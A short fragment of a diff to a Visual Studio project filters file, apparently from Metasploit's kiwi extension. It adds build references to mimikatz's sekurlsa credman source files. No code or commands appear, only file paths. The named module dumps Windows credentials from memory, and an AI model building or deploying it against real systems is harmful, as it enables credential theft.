<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_credman.h">
|
||||
<Filter>modules\sekurlsa\packages</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\crypto\kuhl_m_sekurlsa_nt5.c">
|
||||
@ -292,6 +295,9 @@
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\kuhl_m_lsadump.c">
|
||||
<Filter>modules</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\sekurlsa\packages\kuhl_m_sekurlsa_credman.c">
|
||||
<Filter>modules\sekurlsa\packages</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Filter Include="modules">
|
||||
|